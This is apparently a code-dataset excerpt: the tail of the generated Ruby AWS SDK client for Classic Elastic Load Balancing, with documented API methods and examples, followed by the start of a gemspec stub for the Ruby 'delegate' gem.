# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].default_value #=> String
# resp.policy_type_descriptions[0].policy_attribute_type_descriptions[0].cardinality #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeLoadBalancerPolicyTypes AWS API Documentation
#
# @overload describe_load_balancer_policy_types(params = {})
# @param [Hash] params ({})
def describe_load_balancer_policy_types(params = {}, options = {})
req = build_request(:describe_load_balancer_policy_types, params)
req.send_request(options)
end
# Describes the specified the load balancers. If no load balancers are
# specified, the call describes all of your load balancers.
#
# @option params [Array<String>] :load_balancer_names
# The names of the load balancers.
#
# @option params [String] :marker
# The marker for the next set of results. (You received this marker from
# a previous call.)
#
# @option params [Integer] :page_size
# The maximum number of results to return with this call (a number from
# 1 to 400). The default is 400.
#
# @return [Types::DescribeAccessPointsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeAccessPointsOutput#load_balancer_descriptions #load_balancer_descriptions} => Array<Types::LoadBalancerDescription>
# * {Types::DescribeAccessPointsOutput#next_marker #next_marker} => String
#
#
# @example Example: To describe one of your load balancers
#
# # This example describes the specified load balancer.
#
# resp = client.describe_load_balancers({
# load_balancer_names: [
# "my-load-balancer",
# ],
# })
#
# resp.to_h outputs the following:
# {
# load_balancer_descriptions: [
# {
# availability_zones: [
# "us-west-2a",
# ],
# backend_server_descriptions: [
# {
# instance_port: 80,
# policy_names: [
# "my-ProxyProtocol-policy",
# ],
# },
# ],
# canonical_hosted_zone_name: "my-load-balancer-1234567890.us-west-2.elb.amazonaws.com",
# canonical_hosted_zone_name_id: "Z3DZXE0EXAMPLE",
# created_time: Time.parse("2015-03-19T03:24:02.650Z"),
# dns_name: "my-load-balancer-1234567890.us-west-2.elb.amazonaws.com",
# health_check: {
# healthy_threshold: 2,
# interval: 30,
# target: "HTTP:80/png",
# timeout: 3,
# unhealthy_threshold: 2,
# },
# instances: [
# {
# instance_id: "i-207d9717",
# },
# {
# instance_id: "i-afefb49b",
# },
# ],
# listener_descriptions: [
# {
# listener: {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# policy_names: [
# ],
# },
# {
# listener: {
# instance_port: 443,
# instance_protocol: "HTTPS",
# load_balancer_port: 443,
# protocol: "HTTPS",
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/my-server-cert",
# },
# policy_names: [
# "ELBSecurityPolicy-2015-03",
# ],
# },
# ],
# load_balancer_name: "my-load-balancer",
# policies: {
# app_cookie_stickiness_policies: [
# ],
# lb_cookie_stickiness_policies: [
# {
# cookie_expiration_period: 60,
# policy_name: "my-duration-cookie-policy",
# },
# ],
# other_policies: [
# "my-PublicKey-policy",
# "my-authentication-policy",
# "my-SSLNegotiation-policy",
# "my-ProxyProtocol-policy",
# "ELBSecurityPolicy-2015-03",
# ],
# },
# scheme: "internet-facing",
# security_groups: [
# "sg-a61988c3",
# ],
# source_security_group: {
# group_name: "my-elb-sg",
# owner_alias: "123456789012",
# },
# subnets: [
# "subnet-15aaab61",
# ],
# vpc_id: "vpc-a01106c2",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_load_balancers({
# load_balancer_names: ["AccessPointName"],
# marker: "Marker",
# page_size: 1,
# })
#
# @example Response structure
#
# resp.load_balancer_descriptions #=> Array
# resp.load_balancer_descriptions[0].load_balancer_name #=> String
# resp.load_balancer_descriptions[0].dns_name #=> String
# resp.load_balancer_descriptions[0].canonical_hosted_zone_name #=> String
# resp.load_balancer_descriptions[0].canonical_hosted_zone_name_id #=> String
# resp.load_balancer_descriptions[0].listener_descriptions #=> Array
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.protocol #=> String
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.load_balancer_port #=> Integer
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.instance_protocol #=> String
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.instance_port #=> Integer
# resp.load_balancer_descriptions[0].listener_descriptions[0].listener.ssl_certificate_id #=> String
# resp.load_balancer_descriptions[0].listener_descriptions[0].policy_names #=> Array
# resp.load_balancer_descriptions[0].listener_descriptions[0].policy_names[0] #=> String
# resp.load_balancer_descriptions[0].policies.app_cookie_stickiness_policies #=> Array
# resp.load_balancer_descriptions[0].policies.app_cookie_stickiness_policies[0].policy_name #=> String
# resp.load_balancer_descriptions[0].policies.app_cookie_stickiness_policies[0].cookie_name #=> String
# resp.load_balancer_descriptions[0].policies.lb_cookie_stickiness_policies #=> Array
# resp.load_balancer_descriptions[0].policies.lb_cookie_stickiness_policies[0].policy_name #=> String
# resp.load_balancer_descriptions[0].policies.lb_cookie_stickiness_policies[0].cookie_expiration_period #=> Integer
# resp.load_balancer_descriptions[0].policies.other_policies #=> Array
# resp.load_balancer_descriptions[0].policies.other_policies[0] #=> String
# resp.load_balancer_descriptions[0].backend_server_descriptions #=> Array
# resp.load_balancer_descriptions[0].backend_server_descriptions[0].instance_port #=> Integer
# resp.load_balancer_descriptions[0].backend_server_descriptions[0].policy_names #=> Array
# resp.load_balancer_descriptions[0].backend_server_descriptions[0].policy_names[0] #=> String
# resp.load_balancer_descriptions[0].availability_zones #=> Array
# resp.load_balancer_descriptions[0].availability_zones[0] #=> String
# resp.load_balancer_descriptions[0].subnets #=> Array
# resp.load_balancer_descriptions[0].subnets[0] #=> String
# resp.load_balancer_descriptions[0].vpc_id #=> String
# resp.load_balancer_descriptions[0].instances #=> Array
# resp.load_balancer_descriptions[0].instances[0].instance_id #=> String
# resp.load_balancer_descriptions[0].health_check.target #=> String
# resp.load_balancer_descriptions[0].health_check.interval #=> Integer
# resp.load_balancer_descriptions[0].health_check.timeout #=> Integer
# resp.load_balancer_descriptions[0].health_check.unhealthy_threshold #=> Integer
# resp.load_balancer_descriptions[0].health_check.healthy_threshold #=> Integer
# resp.load_balancer_descriptions[0].source_security_group.owner_alias #=> String
# resp.load_balancer_descriptions[0].source_security_group.group_name #=> String
# resp.load_balancer_descriptions[0].security_groups #=> Array
# resp.load_balancer_descriptions[0].security_groups[0] #=> String
# resp.load_balancer_descriptions[0].created_time #=> Time
# resp.load_balancer_descriptions[0].scheme #=> String
# resp.next_marker #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeLoadBalancers AWS API Documentation
#
# @overload describe_load_balancers(params = {})
# @param [Hash] params ({})
def describe_load_balancers(params = {}, options = {})
req = build_request(:describe_load_balancers, params)
req.send_request(options)
end
# Describes the tags associated with the specified load balancers.
#
# @option params [required, Array<String>] :load_balancer_names
# The names of the load balancers.
#
# @return [Types::DescribeTagsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeTagsOutput#tag_descriptions #tag_descriptions} => Array<Types::TagDescription>
#
#
# @example Example: To describe the tags for a load balancer
#
# # This example describes the tags for the specified load balancer.
#
# resp = client.describe_tags({
# load_balancer_names: [
# "my-load-balancer",
# ],
# })
#
# resp.to_h outputs the following:
# {
# tag_descriptions: [
# {
# load_balancer_name: "my-load-balancer",
# tags: [
# {
# key: "project",
# value: "lima",
# },
# {
# key: "department",
# value: "digital-media",
# },
# ],
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_tags({
# load_balancer_names: ["AccessPointName"], # required
# })
#
# @example Response structure
#
# resp.tag_descriptions #=> Array
# resp.tag_descriptions[0].load_balancer_name #=> String
# resp.tag_descriptions[0].tags #=> Array
# resp.tag_descriptions[0].tags[0].key #=> String
# resp.tag_descriptions[0].tags[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeTags AWS API Documentation
#
# @overload describe_tags(params = {})
# @param [Hash] params ({})
def describe_tags(params = {}, options = {})
req = build_request(:describe_tags, params)
req.send_request(options)
end
# Removes the specified subnets from the set of configured subnets for
# the load balancer.
#
# After a subnet is removed, all EC2 instances registered with the load
# balancer in the removed subnet go into the `OutOfService` state. Then,
# the load balancer balances the traffic among the remaining routable
# subnets.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :subnets
# The IDs of the subnets.
#
# @return [Types::DetachLoadBalancerFromSubnetsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DetachLoadBalancerFromSubnetsOutput#subnets #subnets} => Array<String>
#
#
# @example Example: To detach a load balancer from a subnet
#
# # This example detaches the specified load balancer from the specified subnet.
#
# resp = client.detach_load_balancer_from_subnets({
# load_balancer_name: "my-load-balancer",
# subnets: [
# "subnet-0ecac448",
# ],
# })
#
# resp.to_h outputs the following:
# {
# subnets: [
# "subnet-15aaab61",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.detach_load_balancer_from_subnets({
# load_balancer_name: "AccessPointName", # required
# subnets: ["SubnetId"], # required
# })
#
# @example Response structure
#
# resp.subnets #=> Array
# resp.subnets[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DetachLoadBalancerFromSubnets AWS API Documentation
#
# @overload detach_load_balancer_from_subnets(params = {})
# @param [Hash] params ({})
def detach_load_balancer_from_subnets(params = {}, options = {})
req = build_request(:detach_load_balancer_from_subnets, params)
req.send_request(options)
end
# Removes the specified Availability Zones from the set of Availability
# Zones for the specified load balancer in EC2-Classic or a default VPC.
#
# For load balancers in a non-default VPC, use
# DetachLoadBalancerFromSubnets.
#
# There must be at least one Availability Zone registered with a load
# balancer at all times. After an Availability Zone is removed, all
# instances registered with the load balancer that are in the removed
# Availability Zone go into the `OutOfService` state. Then, the load
# balancer attempts to equally balance the traffic among its remaining
# Availability Zones.
#
# For more information, see [Add or Remove Availability Zones][1] in the
# *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-disable-az.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :availability_zones
# The Availability Zones.
#
# @return [Types::RemoveAvailabilityZonesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::RemoveAvailabilityZonesOutput#availability_zones #availability_zones} => Array<String>
#
#
# @example Example: To disable an Availability Zone for a load balancer
#
# # This example removes the specified Availability Zone from the set of Availability Zones for the specified load balancer.
#
# resp = client.disable_availability_zones_for_load_balancer({
# availability_zones: [
# "us-west-2a",
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# availability_zones: [
# "us-west-2b",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.disable_availability_zones_for_load_balancer({
# load_balancer_name: "AccessPointName", # required
# availability_zones: ["AvailabilityZone"], # required
# })
#
# @example Response structure
#
# resp.availability_zones #=> Array
# resp.availability_zones[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DisableAvailabilityZonesForLoadBalancer AWS API Documentation
#
# @overload disable_availability_zones_for_load_balancer(params = {})
# @param [Hash] params ({})
def disable_availability_zones_for_load_balancer(params = {}, options = {})
req = build_request(:disable_availability_zones_for_load_balancer, params)
req.send_request(options)
end
# Adds the specified Availability Zones to the set of Availability Zones
# for the specified load balancer in EC2-Classic or a default VPC.
#
# For load balancers in a non-default VPC, use
# AttachLoadBalancerToSubnets.
#
# The load balancer evenly distributes requests across all its
# registered Availability Zones that contain instances. For more
# information, see [Add or Remove Availability Zones][1] in the *Classic
# Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-disable-az.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :availability_zones
# The Availability Zones. These must be in the same region as the load
# balancer.
#
# @return [Types::AddAvailabilityZonesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::AddAvailabilityZonesOutput#availability_zones #availability_zones} => Array<String>
#
#
# @example Example: To enable an Availability Zone for a load balancer
#
# # This example adds the specified Availability Zone to the specified load balancer.
#
# resp = client.enable_availability_zones_for_load_balancer({
# availability_zones: [
# "us-west-2b",
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# availability_zones: [
# "us-west-2a",
# "us-west-2b",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.enable_availability_zones_for_load_balancer({
# load_balancer_name: "AccessPointName", # required
# availability_zones: ["AvailabilityZone"], # required
# })
#
# @example Response structure
#
# resp.availability_zones #=> Array
# resp.availability_zones[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/EnableAvailabilityZonesForLoadBalancer AWS API Documentation
#
# @overload enable_availability_zones_for_load_balancer(params = {})
# @param [Hash] params ({})
def enable_availability_zones_for_load_balancer(params = {}, options = {})
req = build_request(:enable_availability_zones_for_load_balancer, params)
req.send_request(options)
end
# Modifies the attributes of the specified load balancer.
#
# You can modify the load balancer attributes, such as `AccessLogs`,
# `ConnectionDraining`, and `CrossZoneLoadBalancing` by either enabling
# or disabling them. Or, you can modify the load balancer attribute
# `ConnectionSettings` by specifying an idle connection timeout value
# for your load balancer.
#
# For more information, see the following in the *Classic Load Balancers
# Guide*\:
#
# * [Cross-Zone Load Balancing][1]
#
# * [Connection Draining][2]
#
# * [Access Logs][3]
#
# * [Idle Connection Timeout][4]
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-disable-crosszone-lb.html
# [2]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/config-conn-drain.html
# [3]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/access-log-collection.html
# [4]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/config-idle-timeout.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Types::LoadBalancerAttributes] :load_balancer_attributes
# The attributes for the load balancer.
#
# @return [Types::ModifyLoadBalancerAttributesOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ModifyLoadBalancerAttributesOutput#load_balancer_name #load_balancer_name} => String
# * {Types::ModifyLoadBalancerAttributesOutput#load_balancer_attributes #load_balancer_attributes} => Types::LoadBalancerAttributes
#
#
# @example Example: To enable cross-zone load balancing
#
# # This example enables cross-zone load balancing for the specified load balancer.
#
# resp = client.modify_load_balancer_attributes({
# load_balancer_attributes: {
# cross_zone_load_balancing: {
# enabled: true,
# },
# },
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# load_balancer_attributes: {
# cross_zone_load_balancing: {
# enabled: true,
# },
# },
# load_balancer_name: "my-load-balancer",
# }
#
# @example Example: To enable connection draining
#
# # This example enables connection draining for the specified load balancer.
#
# resp = client.modify_load_balancer_attributes({
# load_balancer_attributes: {
# connection_draining: {
# enabled: true,
# timeout: 300,
# },
# },
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# load_balancer_attributes: {
# connection_draining: {
# enabled: true,
# timeout: 300,
# },
# },
# load_balancer_name: "my-load-balancer",
# }
#
# @example Request syntax with placeholder values
#
# resp = client.modify_load_balancer_attributes({
# load_balancer_name: "AccessPointName", # required
# load_balancer_attributes: { # required
# cross_zone_load_balancing: {
# enabled: false, # required
# },
# access_log: {
# enabled: false, # required
# s3_bucket_name: "S3BucketName",
# emit_interval: 1,
# s3_bucket_prefix: "AccessLogPrefix",
# },
# connection_draining: {
# enabled: false, # required
# timeout: 1,
# },
# connection_settings: {
# idle_timeout: 1, # required
# },
# additional_attributes: [
# {
# key: "AdditionalAttributeKey",
# value: "AdditionalAttributeValue",
# },
# ],
# },
# })
#
# @example Response structure
#
# resp.load_balancer_name #=> String
# resp.load_balancer_attributes.cross_zone_load_balancing.enabled #=> Boolean
# resp.load_balancer_attributes.access_log.enabled #=> Boolean
# resp.load_balancer_attributes.access_log.s3_bucket_name #=> String
# resp.load_balancer_attributes.access_log.emit_interval #=> Integer
# resp.load_balancer_attributes.access_log.s3_bucket_prefix #=> String
# resp.load_balancer_attributes.connection_draining.enabled #=> Boolean
# resp.load_balancer_attributes.connection_draining.timeout #=> Integer
# resp.load_balancer_attributes.connection_settings.idle_timeout #=> Integer
# resp.load_balancer_attributes.additional_attributes #=> Array
# resp.load_balancer_attributes.additional_attributes[0].key #=> String
# resp.load_balancer_attributes.additional_attributes[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/ModifyLoadBalancerAttributes AWS API Documentation
#
# @overload modify_load_balancer_attributes(params = {})
# @param [Hash] params ({})
def modify_load_balancer_attributes(params = {}, options = {})
req = build_request(:modify_load_balancer_attributes, params)
req.send_request(options)
end
# Adds the specified instances to the specified load balancer.
#
# The instance must be a running instance in the same network as the
# load balancer (EC2-Classic or the same VPC). If you have EC2-Classic
# instances and a load balancer in a VPC with ClassicLink enabled, you
# can link the EC2-Classic instances to that VPC and then register the
# linked EC2-Classic instances with the load balancer in the VPC.
#
# Note that `RegisterInstanceWithLoadBalancer` completes when the
# request has been registered. Instance registration takes a little time
# to complete. To check the state of the registered instances, use
# DescribeLoadBalancers or DescribeInstanceHealth.
#
# After the instance is registered, it starts receiving traffic and
# requests from the load balancer. Any instance that is not in one of
# the Availability Zones registered for the load balancer is moved to
# the `OutOfService` state. If an Availability Zone is added to the load
# balancer later, any instances registered with the load balancer move
# to the `InService` state.
#
# To deregister instances from a load balancer, use
# DeregisterInstancesFromLoadBalancer.
#
# For more information, see [Register or De-Register EC2 Instances][1]
# in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-deregister-register-instances.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<Types::Instance>] :instances
# The IDs of the instances.
#
# @return [Types::RegisterEndPointsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::RegisterEndPointsOutput#instances #instances} => Array<Types::Instance>
#
#
# @example Example: To register instances with a load balancer
#
# # This example registers the specified instance with the specified load balancer.
#
# resp = client.register_instances_with_load_balancer({
# instances: [
# {
# instance_id: "i-d6f6fae3",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# instances: [
# {
# instance_id: "i-d6f6fae3",
# },
# {
# instance_id: "i-207d9717",
# },
# {
# instance_id: "i-afefb49b",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.register_instances_with_load_balancer({
# load_balancer_name: "AccessPointName", # required
# instances: [ # required
# {
# instance_id: "InstanceId",
# },
# ],
# })
#
# @example Response structure
#
# resp.instances #=> Array
# resp.instances[0].instance_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/RegisterInstancesWithLoadBalancer AWS API Documentation
#
# @overload register_instances_with_load_balancer(params = {})
# @param [Hash] params ({})
def register_instances_with_load_balancer(params = {}, options = {})
req = build_request(:register_instances_with_load_balancer, params)
req.send_request(options)
end
# Removes one or more tags from the specified load balancer.
#
# @option params [required, Array<String>] :load_balancer_names
# The name of the load balancer. You can specify a maximum of one load
# balancer name.
#
# @option params [required, Array<Types::TagKeyOnly>] :tags
# The list of tag keys to remove.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To remove tags from a load balancer
#
# # This example removes the specified tag from the specified load balancer.
#
# resp = client.remove_tags({
# load_balancer_names: [
# "my-load-balancer",
# ],
# tags: [
# {
# key: "project",
# },
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.remove_tags({
# load_balancer_names: ["AccessPointName"], # required
# tags: [ # required
# {
# key: "TagKey",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/RemoveTags AWS API Documentation
#
# @overload remove_tags(params = {})
# @param [Hash] params ({})
def remove_tags(params = {}, options = {})
req = build_request(:remove_tags, params)
req.send_request(options)
end
# Sets the certificate that terminates the specified listener's SSL
# connections. The specified certificate replaces any prior certificate
# that was used on the same load balancer and port.
#
# For more information about updating your SSL certificate, see [Replace
# the SSL Certificate for Your Load Balancer][1] in the *Classic Load
# Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-update-ssl-cert.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Integer] :load_balancer_port
# The port that uses the specified SSL certificate.
#
# @option params [required, String] :ssl_certificate_id
# The Amazon Resource Name (ARN) of the SSL certificate.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To update the SSL certificate for an HTTPS listener
#
# # This example replaces the existing SSL certificate for the specified HTTPS listener.
#
# resp = client.set_load_balancer_listener_ssl_certificate({
# load_balancer_name: "my-load-balancer",
# load_balancer_port: 443,
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/new-server-cert",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.set_load_balancer_listener_ssl_certificate({
# load_balancer_name: "AccessPointName", # required
# load_balancer_port: 1, # required
# ssl_certificate_id: "SSLCertificateId", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/SetLoadBalancerListenerSSLCertificate AWS API Documentation
#
# @overload set_load_balancer_listener_ssl_certificate(params = {})
# @param [Hash] params ({})
def set_load_balancer_listener_ssl_certificate(params = {}, options = {})
req = build_request(:set_load_balancer_listener_ssl_certificate, params)
req.send_request(options)
end
# Replaces the set of policies associated with the specified port on
# which the EC2 instance is listening with a new set of policies. At
# this time, only the back-end server authentication policy type can be
# applied to the instance ports; this policy type is composed of
# multiple public key policies.
#
# Each time you use `SetLoadBalancerPoliciesForBackendServer` to enable
# the policies, use the `PolicyNames` parameter to list the policies
# that you want to enable.
#
# You can use DescribeLoadBalancers or DescribeLoadBalancerPolicies to
# verify that the policy is associated with the EC2 instance.
#
# For more information about enabling back-end instance authentication,
# see [Configure Back-end Instance Authentication][1] in the *Classic
# Load Balancers Guide*. For more information about Proxy Protocol, see
# [Configure Proxy Protocol Support][2] in the *Classic Load Balancers
# Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-create-https-ssl-load-balancer.html#configure_backendauth_clt
# [2]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/enable-proxy-protocol.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Integer] :instance_port
# The port number associated with the EC2 instance.
#
# @option params [required, Array<String>] :policy_names
# The names of the policies. If the list is empty, then all current
# polices are removed from the EC2 instance.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To replace the policies associated with a port for a backend instance
#
# # This example replaces the policies that are currently associated with the specified port.
#
# resp = client.set_load_balancer_policies_for_backend_server({
# instance_port: 80,
# load_balancer_name: "my-load-balancer",
# policy_names: [
# "my-ProxyProtocol-policy",
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.set_load_balancer_policies_for_backend_server({
# load_balancer_name: "AccessPointName", # required
# instance_port: 1, # required
# policy_names: ["PolicyName"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/SetLoadBalancerPoliciesForBackendServer AWS API Documentation
#
# @overload set_load_balancer_policies_for_backend_server(params = {})
# @param [Hash] params ({})
def set_load_balancer_policies_for_backend_server(params = {}, options = {})
req = build_request(:set_load_balancer_policies_for_backend_server, params)
req.send_request(options)
end
# Replaces the current set of policies for the specified load balancer
# port with the specified set of policies.
#
# To enable back-end server authentication, use
# SetLoadBalancerPoliciesForBackendServer.
#
# For more information about setting policies, see [Update the SSL
# Negotiation Configuration][1], [Duration-Based Session Stickiness][2],
# and [Application-Controlled Session Stickiness][3] in the *Classic
# Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/ssl-config-update.html
# [2]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-sticky-sessions.html#enable-sticky-sessions-duration
# [3]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-sticky-sessions.html#enable-sticky-sessions-application
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Integer] :load_balancer_port
# The external port of the load balancer.
#
# @option params [required, Array<String>] :policy_names
# The names of the policies. This list must include all policies to be
# enabled. If you omit a policy that is currently enabled, it is
# disabled. If the list is empty, all current policies are disabled.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To replace the policies associated with a listener
#
# # This example replaces the policies that are currently associated with the specified listener.
#
# resp = client.set_load_balancer_policies_of_listener({
# load_balancer_name: "my-load-balancer",
# load_balancer_port: 80,
# policy_names: [
# "my-SSLNegotiation-policy",
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.set_load_balancer_policies_of_listener({
# load_balancer_name: "AccessPointName", # required
# load_balancer_port: 1, # required
# policy_names: ["PolicyName"], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/SetLoadBalancerPoliciesOfListener AWS API Documentation
#
# @overload set_load_balancer_policies_of_listener(params = {})
# @param [Hash] params ({})
def set_load_balancer_policies_of_listener(params = {}, options = {})
req = build_request(:set_load_balancer_policies_of_listener, params)
req.send_request(options)
end
# @!endgroup
# @param params ({})
# @api private
def build_request(operation_name, params = {})
handlers = @handlers.for(operation_name)
context = Seahorse::Client::RequestContext.new(
operation_name: operation_name,
operation: config.api.operation(operation_name),
client: self,
params: params,
config: config)
context[:gem_name] = 'aws-sdk-elasticloadbalancing'
context[:gem_version] = '1.14.0'
Seahorse::Client::Request.new(handlers, context)
end
# Polls an API operation until a resource enters a desired state.
#
# ## Basic Usage
#
# A waiter will call an API operation until:
#
# * It is successful
# * It enters a terminal state
# * It makes the maximum number of attempts
#
# In between attempts, the waiter will sleep.
#
# # polls in a loop, sleeping between attempts
# client.wait_until(waiter_name, params)
#
# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. You can pass
# configuration as the final arguments hash.
#
# # poll for ~25 seconds
# client.wait_until(waiter_name, params, {
# max_attempts: 5,
# delay: 5,
# })
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# client.wait_until(waiter_name, params, {
#
# # disable max attempts
# max_attempts: nil,
#
# # poll for 1 hour, instead of a number of attempts
# before_wait: -> (attempts, response) do
# throw :failure if Time.now - started_at > 3600
# end
# })
#
# ## Handling Errors
#
# When a waiter is unsuccessful, it will raise an error.
# All of the failure errors extend from
# {Aws::Waiters::Errors::WaiterFailed}.
#
# begin
# client.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# ## Valid Waiters
#
# The following table lists the valid waiter names, the operations they call,
# and the default `:delay` and `:max_attempts` values.
#
# | waiter_name | params | :delay | :max_attempts |
# | ----------------------- | --------------------------- | -------- | ------------- |
# | any_instance_in_service | {#describe_instance_health} | 15 | 40 |
# | instance_deregistered | {#describe_instance_health} | 15 | 40 |
# | instance_in_service | {#describe_instance_health} | 15 | 40 |
#
# @raise [Errors::FailureStateError] Raised when the waiter terminates
# because the waiter has entered a state that it will not transition
# out of, preventing success.
#
# @raise [Errors::TooManyAttemptsError] Raised when the configured
# maximum number of attempts have been made, and the waiter is not
# yet successful.
#
# @raise [Errors::UnexpectedError] Raised when an error is encounted
# while polling for a resource that is not expected.
#
# @raise [Errors::NoSuchWaiterError] Raised when you request to wait
# for an unknown state.
#
# @return [Boolean] Returns `true` if the waiter was successful.
# @param [Symbol] waiter_name
# @param [Hash] params ({})
# @param [Hash] options ({})
# @option options [Integer] :max_attempts
# @option options [Integer] :delay
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
def wait_until(waiter_name, params = {}, options = {})
w = waiter(waiter_name, options)
yield(w.waiter) if block_given? # deprecated
w.wait(params)
end
# @api private
# @deprecated
def waiter_names
waiters.keys
end
private
# @param [Symbol] waiter_name
# @param [Hash] options ({})
def waiter(waiter_name, options = {})
waiter_class = waiters[waiter_name]
if waiter_class
waiter_class.new(options.merge(client: self))
else
raise Aws::Waiters::Errors::NoSuchWaiterError.new(waiter_name, waiters.keys)
end
end
def waiters
{
any_instance_in_service: Waiters::AnyInstanceInService,
instance_deregistered: Waiters::InstanceDeregistered,
instance_in_service: Waiters::InstanceInService
}
end
class << self
# @api private
attr_reader :identifier
# @api private
def errors_module
Errors
end
end
end
end
| 39.449607 | 427 | 0.638032 |
1d570bd8f78000090960451b86da224870f386be | 1,015 | # -*- encoding: utf-8 -*-
# stub: delegate 0.2.0 ruby lib
Gem::Specification.new do |s|
s.name = "delegate".freeze
s.version = "0.2.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "homepage_uri" => "https://github.com/ruby/delegate", "source_code_uri" => "https://github.com/ruby/delegate" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Yukihiro Matsumoto".freeze]
s.bindir = "exe".freeze
s.date = "2021-07-06"
s.description = "Provides three abilities to delegate method calls to an object.".freeze
s.email = ["[email protected]".freeze]
s.files = ["delegate.rb".freeze]
s.homepage = "https://github.com/ruby/delegate".freeze
s.licenses = ["Ruby".freeze, "BSD-2-Clause".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.7".freeze)
s.rubygems_version = "3.2.15".freeze
